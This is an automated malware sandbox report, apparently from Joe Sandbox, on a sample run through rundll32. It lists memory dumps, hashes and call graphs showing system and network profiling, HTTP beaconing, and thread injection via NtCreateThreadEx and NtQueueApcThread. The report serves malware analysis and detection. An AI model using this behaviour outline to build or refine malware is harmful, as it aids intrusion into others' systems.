• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: FreeLibrary
• String ID: (Q$xQ
• API String ID: 3664257935-2520453697
• Opcode ID: e408bc19f70a890cedbf3d6b8e0090ec9245b3674f60fe3c468e50ee0711e3f5
• Instruction ID: 652ed09944ffcc1c2ebdf29337a50451ec42049538798433beba786cb379ac14
• Opcode Fuzzy Hash: e408bc19f70a890cedbf3d6b8e0090ec9245b3674f60fe3c468e50ee0711e3f5
• Instruction Fuzzy Hash: 09E08672C0821D97FF311E08D404FB6BAD89764331F15012BD9EC112A092FD1CD1C6D4
APIs
• LocalFree.KERNEL32(00000000,004C4261,00504400,000000FF,C7C71CC4,00000000,?,00000000,?,?,?,00504400,000000FF,?,004C3A75,?), ref: 004C4096
• LocalAlloc.KERNEL32(00000040,40000022,C7C71CC4,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004C4154
• LocalAlloc.KERNEL32(00000040,3FFFFFFF,C7C71CC4,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004C4177
• LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 004C4217
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: Local$AllocFree
• String ID:
• API String ID: 2012307162-0
• Opcode ID: b246a501348f66abf24a74b90528fd2da01d26aa535199c8292862d596bf2b19
• Instruction ID: f26d6cccb78037254d4df243507150dbd5e7eee14505e8bf6924e1bb5b682d3b
• Opcode Fuzzy Hash: b246a501348f66abf24a74b90528fd2da01d26aa535199c8292862d596bf2b19
• Instruction Fuzzy Hash: 3B51B375A002059FDB18CF69C995FAEBBB5FB88350F14462EE925E7380D734AD40CB94
APIs
• LocalAlloc.KERNEL32(00000040,80000022,00000000,?,00000000), ref: 004C1E01
• LocalAlloc.KERNEL32(00000040,7FFFFFFF,00000000,?,00000000), ref: 004C1E21
• LocalFree.KERNEL32(7FFFFFFE,?,00000000), ref: 004C1EA7
• LocalFree.KERNEL32(00000001,C7C71CC4,00000000,00000000,00503C40,000000FF,?,00000000), ref: 004C1F2D
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: Local$AllocFree
• String ID:
• API String ID: 2012307162-0
• Opcode ID: 13e79eda2f1b1943c97dba1df7af395d4b32d64bea2913f963930dc364050b3d
• Instruction ID: 525641ccb3129ba4a3a4e4e2d908c8d5c2418f17213d01667a38bfde0e8c62d6
• Opcode Fuzzy Hash: 13e79eda2f1b1943c97dba1df7af395d4b32d64bea2913f963930dc364050b3d
• Instruction Fuzzy Hash: E451D0765042159FC715DF28D880E6BB7E9FB8A360F100A2FF816D73A1DB74E9048B95

Execution Graph

Execution Coverage: 4.2%
Dynamic/Decrypted Code Coverage: 93.7%
Signature Coverage: 12.8%
Total number of Nodes: 650
Total number of Limit Nodes: 49
26096->26097 26268 1a9942adfc0 26097->26268 26100 1a9942b4eaa GetNativeSystemInfo 26102 1a9942b4ed3 26100->26102 26103 1a9942b4ee8 26100->26103 26101 1a9942c3de0 RtlFreeHeap 26101->26100 26105 1a9942c3de0 RtlFreeHeap 26102->26105 26103->26102 26104 1a9942b4f17 26103->26104 26106 1a9942c3de0 RtlFreeHeap 26104->26106 26107 1a9942b4f15 26105->26107 26106->26107 26109 1a9942c3de0 RtlFreeHeap 26107->26109 26112 1a9942b4f67 26107->26112 26108 1a9942b4f8f GetAdaptersInfo 26110 1a9942b4fbb 26108->26110 26111 1a9942b4fdd 26108->26111 26109->26112 26113 1a9942bb4e0 RtlFreeHeap 26110->26113 26111->26110 26115 1a9942b4fea GetAdaptersInfo 26111->26115 26112->26108 26114 1a9942b4fc5 26113->26114 26116 1a9942bb4e0 RtlFreeHeap 26114->26116 26115->26110 26119 1a9942b4fff 26115->26119 26117 1a9942b4fcd 26116->26117 26117->25768 26118 1a9942c3de0 RtlFreeHeap 26118->26119 26119->26110 26119->26118 26121 1a9942c4759 26120->26121 26122 1a9942c47af 26121->26122 26123 1a9942c47ad NtFreeVirtualMemory 26121->26123 26122->25774 26123->26122 26124->25774 26126 1a994298bde 26125->26126 26127 1a99429a050 RtlFreeHeap 26126->26127 26128 1a994298c5e 26127->26128 26129 1a99429a050 RtlFreeHeap 26128->26129 26130 1a994298c97 26129->26130 26131 1a9942bb4e0 RtlFreeHeap 26130->26131 26132 1a994298cee 26131->26132 26133 1a994298d5c 26132->26133 26134 1a994298d44 26132->26134 26135 1a994298d5e 26132->26135 26136 1a99429a050 RtlFreeHeap 26133->26136 26138 1a994298d8b 26133->26138 26134->26133 26139 1a99429a050 RtlFreeHeap 26134->26139 26137 1a99429a050 RtlFreeHeap 26135->26137 26136->26138 26137->26133 26140 1a9942bb4e0 RtlFreeHeap 26138->26140 26139->26133 26141 1a994298d93 26140->26141 26142 1a9942bb4e0 RtlFreeHeap 26141->26142 26143 1a994298d9b 26142->26143 26144 1a994298de9 26143->26144 26145 1a994298df0 26143->26145 26307 1a9942a6fa0 LdrGetProcedureAddress RtlFreeHeap 26144->26307 26272 1a994297830 26145->26272 26148 1a994298dee 26149 1a994298e8e 26148->26149 26150 1a9942abe20 RtlFreeHeap 26148->26150 
26296 1a9942917b0 26149->26296 26152 1a994298e23 26150->26152 26154 1a994298e2a 26152->26154 26160 1a994298e34 26152->26160 26153 1a9942bb4e0 RtlFreeHeap 26155 1a994298ea4 26153->26155 26156 1a9942bb4e0 RtlFreeHeap 26154->26156 26157 1a9942bb4e0 RtlFreeHeap 26155->26157 26158 1a994298e32 26156->26158 26159 1a994298eac 26157->26159 26158->26153 26161 1a9942bb4e0 RtlFreeHeap 26159->26161 26162 1a9942bb4e0 RtlFreeHeap 26160->26162 26163 1a994298eb4 26161->26163 26164 1a994298e5f 26162->26164 26165 1a9942bb4e0 RtlFreeHeap 26163->26165 26166 1a99429a050 RtlFreeHeap 26164->26166 26167 1a994298ebc 26165->26167 26168 1a994298e71 26166->26168 26167->25774 26169 1a9942bb4e0 RtlFreeHeap 26168->26169 26170 1a994298e79 26169->26170 26308 1a9942b51d0 RtlFreeHeap 26170->26308 26172 1a994298e86 26173 1a9942bb4e0 RtlFreeHeap 26172->26173 26173->26149 26176 1a99429fff9 26174->26176 26175 1a994292939 26194 1a99429f8a0 26175->26194 26176->26175 26177 1a99429cce0 LdrGetProcedureAddress 26176->26177 26178 1a9942a0072 26177->26178 26179 1a99429cce0 LdrGetProcedureAddress 26178->26179 26180 1a9942a008d 26179->26180 26181 1a99429cce0 LdrGetProcedureAddress 26180->26181 26182 1a9942a00b6 26181->26182 26183 1a99429cce0 LdrGetProcedureAddress 26182->26183 26184 1a9942a00d5 26183->26184 26185 1a99429cce0 LdrGetProcedureAddress 26184->26185 26186 1a9942a00f4 26185->26186 26187 1a99429cce0 LdrGetProcedureAddress 26186->26187 26188 1a9942a0113 26187->26188 26189 1a99429cce0 LdrGetProcedureAddress 26188->26189 26190 1a9942a0132 26189->26190 26191 1a99429cce0 LdrGetProcedureAddress 26190->26191 26192 1a9942a0151 26191->26192 26193 1a99429cce0 LdrGetProcedureAddress 26192->26193 26193->26175 26195 1a99429f8da 26194->26195 26196 1a99429293e 26195->26196 26197 1a99429cce0 LdrGetProcedureAddress 26195->26197 26202 1a9942a3470 26196->26202 26198 1a99429f900 26197->26198 26199 1a99429cce0 LdrGetProcedureAddress 26198->26199 26200 1a99429f91b 26199->26200 26201 1a99429cce0 LdrGetProcedureAddress 
26200->26201 26201->26196 26203 1a9942a3489 26202->26203 26204 1a9942a3493 26203->26204 26205 1a99429cce0 LdrGetProcedureAddress 26203->26205 26204->25781 26206 1a9942a3502 26205->26206 26207 1a99429cce0 LdrGetProcedureAddress 26206->26207 26208 1a9942a351d 26207->26208 26209 1a99429cce0 LdrGetProcedureAddress 26208->26209 26210 1a9942a3546 26209->26210 26211 1a99429cce0 LdrGetProcedureAddress 26210->26211 26212 1a9942a3565 26211->26212 26213 1a99429cce0 LdrGetProcedureAddress 26212->26213 26214 1a9942a3584 26213->26214 26215 1a99429cce0 LdrGetProcedureAddress 26214->26215 26216 1a9942a35a3 26215->26216 26217 1a99429cce0 LdrGetProcedureAddress 26216->26217 26218 1a9942a35c2 26217->26218 26219 1a99429cce0 LdrGetProcedureAddress 26218->26219 26220 1a9942a35e1 26219->26220 26221 1a99429cce0 LdrGetProcedureAddress 26220->26221 26222 1a9942a3600 26221->26222 26223 1a99429cce0 LdrGetProcedureAddress 26222->26223 26224 1a9942a361f 26223->26224 26225 1a99429cce0 LdrGetProcedureAddress 26224->26225 26226 1a9942a363e 26225->26226 26227 1a99429cce0 LdrGetProcedureAddress 26226->26227 26228 1a9942a365d 26227->26228 26229 1a99429cce0 LdrGetProcedureAddress 26228->26229 26230 1a9942a367c 26229->26230 26231 1a99429cce0 LdrGetProcedureAddress 26230->26231 26232 1a9942a369b 26231->26232 26233 1a99429cce0 LdrGetProcedureAddress 26232->26233 26234 1a9942a36ba 26233->26234 26235 1a99429cce0 LdrGetProcedureAddress 26234->26235 26236 1a9942a36d9 26235->26236 26237 1a99429cce0 LdrGetProcedureAddress 26236->26237 26238 1a9942a36f8 26237->26238 26239 1a99429cce0 LdrGetProcedureAddress 26238->26239 26240 1a9942a3717 26239->26240 26241 1a99429cce0 LdrGetProcedureAddress 26240->26241 26242 1a9942a3736 26241->26242 26243 1a99429cce0 LdrGetProcedureAddress 26242->26243 26244 1a9942a3755 26243->26244 26245 1a99429cce0 LdrGetProcedureAddress 26244->26245 26245->26204 26248 1a99429cd1b 26246->26248 26247 1a99429cdbf 26247->25785 26248->26247 26249 1a99429cd9b LdrGetProcedureAddress 26248->26249 
26249->26247 26251 1a994298eee CreateMutexExA 26250->26251 26252 1a9942c3de0 26251->26252 26254 1a9942c3e14 26252->26254 26253 1a994298f71 26253->25919 26254->26253 26255 1a9942bb4e0 RtlFreeHeap 26254->26255 26255->26254 26257 1a9942b557b 26256->26257 26259 1a994298016 26256->26259 26258 1a9942bb4e0 RtlFreeHeap 26257->26258 26257->26259 26258->26259 26259->25957 26260 1a9942abe20 26259->26260 26261 1a9942abe5c 26260->26261 26262 1a9942abea5 26261->26262 26263 1a9942bb4e0 RtlFreeHeap 26261->26263 26262->25957 26263->26262 26266 1a99429a084 26264->26266 26265 1a99429a118 26265->26011 26266->26265 26267 1a9942bb4e0 RtlFreeHeap 26266->26267 26267->26266 26270 1a9942adff1 26268->26270 26269 1a9942ae03d 26269->26100 26269->26101 26270->26269 26271 1a9942bb4e0 RtlFreeHeap 26270->26271 26271->26269 26273 1a994297885 26272->26273 26274 1a99429788a InternetOpenW 26272->26274 26273->26274 26275 1a994297898 InternetConnectW 26274->26275 26276 1a994297aed 26274->26276 26275->26276 26277 1a9942978dd HttpOpenRequestW 26275->26277 26278 1a994297b0e InternetCloseHandle 26276->26278 26281 1a994297b17 26276->26281 26277->26276 26280 1a994297931 26277->26280 26278->26281 26279 1a994297b60 26279->26148 26280->26276 26283 1a9942979cb HttpSendRequestA 26280->26283 26281->26279 26282 1a994297b56 26281->26282 26286 1a994297b8c 26281->26286 26282->26279 26284 1a9942bb4e0 RtlFreeHeap 26282->26284 26283->26276 26285 1a9942979e4 26283->26285 26284->26279 26290 1a9942bb4e0 RtlFreeHeap 26285->26290 26295 1a994297a24 26285->26295 26287 1a99429a050 RtlFreeHeap 26286->26287 26288 1a994297ba4 26287->26288 26289 1a9942bb4e0 RtlFreeHeap 26288->26289 26289->26279 26290->26295 26291 1a994297a3f InternetQueryDataAvailable 26292 1a994297ae3 26291->26292 26291->26295 26293 1a9942bb4e0 RtlFreeHeap 26292->26293 26293->26276 26294 1a994297a98 RtlReAllocateHeap 26294->26295 26295->26291 26295->26292 26295->26294 26306 1a9942917f5 26296->26306 26297 1a99429180f 26298 1a9942bb4e0 RtlFreeHeap 26297->26298 26299 
1a994291820 26298->26299 26300 1a9942bb4e0 RtlFreeHeap 26299->26300 26302 1a994291838 26300->26302 26301 1a9942bb4e0 RtlFreeHeap 26301->26302 26302->26301 26303 1a99429a050 RtlFreeHeap 26302->26303 26304 1a994291b61 26302->26304 26303->26302 26304->26158 26306->26297 26309 1a994294cd0 26306->26309 26307->26148 26308->26172 26310 1a9942c4360 NtCreateThreadEx 26309->26310 26311 1a994294d3d 26310->26311 26312 1a9942c4ff0 NtQueueApcThread 26311->26312 26313 1a994294d58 26312->26313 26313->26306 26314 1a994291600 26316 1a99429162c 26314->26316 26315 1a994291792 RtlExitUserThread 26316->26315 26323 1a9942c3ba0 26316->26323 26318 1a994291717 26329 1a9942a9830 26318->26329 26320 1a994291735 26321 1a9942bb4e0 RtlFreeHeap 26320->26321 26322 1a99429173d 26321->26322 26322->26315 26324 1a9942c3bc7 26323->26324 26325 1a9942c3bd8 26323->26325 26333 1a9942c3cd0 RtlFreeHeap 26324->26333 26327 1a9942c3c87 26325->26327 26334 1a9942c3cd0 RtlFreeHeap 26325->26334 26327->26318 26331 1a9942a984d 26329->26331 26330 1a9942a9886 26331->26330 26332 1a9942adfc0 RtlFreeHeap 26331->26332 26332->26330 26333->26325 26334->26327

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000006.00000002.3894386824.000001A994291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A994291000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1a994291000_rundll32.jbxd
Similarity
• API ID: InfoName$AdaptersComputer$InformationNativeSystemTokenUser
• String ID:
• API String ID: 1596153048-0
• Opcode ID: 1eee0c0a9b319af5417ccbe6dbfc05b107635735a379de9398a58504e28da6b6
• Instruction ID: fbb4bf7e52ff4ff5f7457230d651e672307932e7ac3a475b84b499cfa756fe50
• Opcode Fuzzy Hash: 1eee0c0a9b319af5417ccbe6dbfc05b107635735a379de9398a58504e28da6b6
• Instruction Fuzzy Hash: 02A1D434318B449FEB55AB14D8567DFB3E1FBC6304F40452DE84AC3292DA75A985CB83
Strings
Memory Dump Source
• Source File: 00000006.00000003.2308001256.00007DF4BD330000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF4BD330000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_3_7df4bd330000_rundll32.jbxd
Similarity
• API ID: CreateSnapshotToolhelp32
• String ID: @
• API String ID: 3332741929-2766056989
• Opcode ID: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
• Instruction ID: b7286ad79d6a077586b3ac9166426be3c0dc1b12a8e16f54a190d9b9253285de
• Opcode Fuzzy Hash: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
• Instruction Fuzzy Hash: E071CF3161494C8FEB94EF5CC898BA977F1FB98325F104226E81EC72A1DB749954CB80

Control-flow Graph

APIs
• OutputDebugStringA.KERNEL32(?,?,00000000,000000018001F860,?,?,?,?,?,00000001800010A6), ref: 000000018001F7AA
• ActivateActCtx.KERNEL32(?,?,00000000,000000018001F860,?,?,?,?,?,00000001800010A6), ref: 000000018001F7D6
• GetLastError.KERNEL32(?,?,00000000,000000018001F860,?,?,?,?,?,00000001800010A6), ref: 000000018001F7E0
Strings
• IsolationAware function called after IsolationAwareCleanup, xrefs: 000000018001F7A3
Memory Dump Source
• Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: ActivateDebugErrorLastOutputString
• String ID: IsolationAware function called after IsolationAwareCleanup
• API String ID: 2396347390-2690750368
• Opcode ID: aaf881318e1cbf80df7b3db725b15d009ca645997f292fdca4c234dcf6e98535
• Instruction ID: 713b0fca42d5e28324eac017ae06fe03b4fcbb217fb76e539ab89f48cb609f07
• Opcode Fuzzy Hash: aaf881318e1cbf80df7b3db725b15d009ca645997f292fdca4c234dcf6e98535
• Instruction Fuzzy Hash: 3D01DE70600D0E86FBF7976198883F913D1AB5D7A4F59D011E915C63A0EF38CACD8710

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3894386824.000001A994291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A994291000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_1a994291000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExitThreadUser
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3424019298-0
                                                                                                                                                            • Opcode ID: 7ef7c9c0f28628f573ade4330c203e0d9ad1a1cad18026d23a2ad19552d955a8
                                                                                                                                                            • Instruction ID: 67271a7afcf94f963a54fdf7250754df8e515e29cb0fd3d3f38a02f510ca346d
                                                                                                                                                            • Opcode Fuzzy Hash: 7ef7c9c0f28628f573ade4330c203e0d9ad1a1cad18026d23a2ad19552d955a8
                                                                                                                                                            • Instruction Fuzzy Hash: A851D578208A085FFB59EF28D8557FA77E1FB96315F10015DE496C32A3CA29E842CB46

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000006.00000002.3894386824.000001A994291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A994291000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1a994291000_rundll32.jbxd
Similarity
• API ID: AddressProcedure
• String ID:
• API String ID: 3653107232-0

Control-flow Graph
Memory Dump Source
• Source File: 00000006.00000002.3894386824.000001A994291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A994291000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1a994291000_rundll32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph

Memory Dump Source
• Source File: 00000006.00000002.3894386824.000001A994291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A994291000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1a994291000_rundll32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000006.00000002.3894386824.000001A994291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A994291000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1a994291000_rundll32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000006.00000002.3894386824.000001A994291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A994291000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1a994291000_rundll32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000006.00000002.3894386824.000001A994291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A994291000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1a994291000_rundll32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000006.00000002.3894386824.000001A994291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A994291000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1a994291000_rundll32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000006.00000002.3894386824.000001A994291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A994291000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1a994291000_rundll32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000006.00000002.3894386824.000001A994291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A994291000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1a994291000_rundll32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000006.00000003.1480402796.000001A994250000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A994250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_3_1a994250000_rundll32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000006.00000003.1480402796.000001A994250000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A994250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_3_1a994250000_rundll32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000006.00000002.3894386824.000001A994291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A994291000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1a994291000_rundll32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLastModule$ActivateCreateDeactivateFileFindHandleLibraryLoadNameQuerySectionString
                                                                                                                                                            • String ID: Comctl32.dll$p
                                                                                                                                                            • API String ID: 550771814-195350848
                                                                                                                                                            • Opcode ID: 34a2f0dbdd0e6ac07f7eb668994bf4ee3323e02dc5c56a4663ff06c3d7fa56c0
                                                                                                                                                            • Instruction ID: 3af2e9fca6f2b8a444c29f43d75c3359d6cbe81a64a43693d8330885b9170935
                                                                                                                                                            • Opcode Fuzzy Hash: 34a2f0dbdd0e6ac07f7eb668994bf4ee3323e02dc5c56a4663ff06c3d7fa56c0
                                                                                                                                                            • Instruction Fuzzy Hash: C4413231218F4886F7A19B15F4983EA73A5F749BA4F908225E69D427E4DF7DC64CCB00

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            [Control-flow graph image: basic blocks 1a994297830 to 1a994297be3; API calls on the graph: InternetOpenW, InternetConnectW, HttpOpenRequestW, HttpSendRequestA, InternetQueryDataAvailable, InternetCloseHandle, RtlReAllocateHeap; internal subcalls 1a9942c2750, 1a9942c1230, 1a9942bb4e0, 1a99429cb60, 1a9942c1410, 1a99429a050, 1a9942c1270, 1a9942bb4c0, 1a9942b44a0]
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3894386824.000001A994291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A994291000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_1a994291000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Internet$HeapHttpOpenRequest$AllocateAvailableCloseConnectDataFreeHandleQuerySend
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3737532752-0
                                                                                                                                                            • Opcode ID: bbb038b860022ece9c615c8651eb51f5b0c4a447bc3b9e1814cb5cd5c2ae45f2
                                                                                                                                                            • Instruction ID: baa786619e30ceb4f38d11375eab858a4b79c33b7ea3e994db1d117bcf7760be
                                                                                                                                                            • Opcode Fuzzy Hash: bbb038b860022ece9c615c8651eb51f5b0c4a447bc3b9e1814cb5cd5c2ae45f2
                                                                                                                                                            • Instruction Fuzzy Hash: 5CB1CF38319A089FEB56EB18D8557ABB7E5FBD9305F04016DA84AC3292DF74D881C783

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3894386824.000001A994291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A994291000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_1a994291000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Thread32$CreateFirstNextSnapshotToolhelp32
                                                                                                                                                            • String ID: 0
                                                                                                                                                            • API String ID: 3779972765-4108050209
                                                                                                                                                            • Opcode ID: 8dc1da9d646cb5a4ca8be2ca344e34fe58ab148069be0f2f5fd075e762ab6ad4
                                                                                                                                                            • Instruction ID: 0d02a002350dd13fef54780dd90c5cf1206e2a09d9ff04872d42a1ce3b7ca269
                                                                                                                                                            • Opcode Fuzzy Hash: 8dc1da9d646cb5a4ca8be2ca344e34fe58ab148069be0f2f5fd075e762ab6ad4
                                                                                                                                                            • Instruction Fuzzy Hash: 5D717D30318B489FE7A5EF28C445BDBB7E1FBCA308F51456DA589C3292DB74A4858B43
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000003.2308001256.00007DF4BD330000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF4BD330000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_3_7df4bd330000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1083639309-0
                                                                                                                                                            • Opcode ID: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
                                                                                                                                                            • Instruction ID: cb58618aaf9390a6bdfed6f512e8ebedec54b81d8f1da2aa9007c9898b6022ab
                                                                                                                                                            • Opcode Fuzzy Hash: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
                                                                                                                                                            • Instruction Fuzzy Hash: A921BC3061494C8FEBA1EF9CC958BEA77F1EB98320F404266D41EDB2A1DE359A448750

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            [Control-flow graph image: basic blocks 18001f820 to 18001f8e9; API calls on the graph: LoadLibraryExW, GetLastError, DeactivateActCtx, SetLastError; internal subcall 18001f790]
                                                                                                                                                            APIs
                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,?,?,00000001800010A6), ref: 000000018001F889
                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000001800010A6), ref: 000000018001F8B6
                                                                                                                                                            • DeactivateActCtx.KERNEL32(?,?,?,?,?,00000001800010A6), ref: 000000018001F8C5
                                                                                                                                                            • SetLastError.KERNEL32(?,?,?,?,?,00000001800010A6), ref: 000000018001F8D1
                                                                                                                                                              • Part of subcall function 000000018001F790: OutputDebugStringA.KERNEL32(?,?,00000000,000000018001F860,?,?,?,?,?,00000001800010A6), ref: 000000018001F7AA
                                                                                                                                                              • Part of subcall function 000000018001F790: ActivateActCtx.KERNEL32(?,?,00000000,000000018001F860,?,?,?,?,?,00000001800010A6), ref: 000000018001F7D6
                                                                                                                                                              • Part of subcall function 000000018001F790: GetLastError.KERNEL32(?,?,00000000,000000018001F860,?,?,?,?,?,00000001800010A6), ref: 000000018001F7E0
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmp
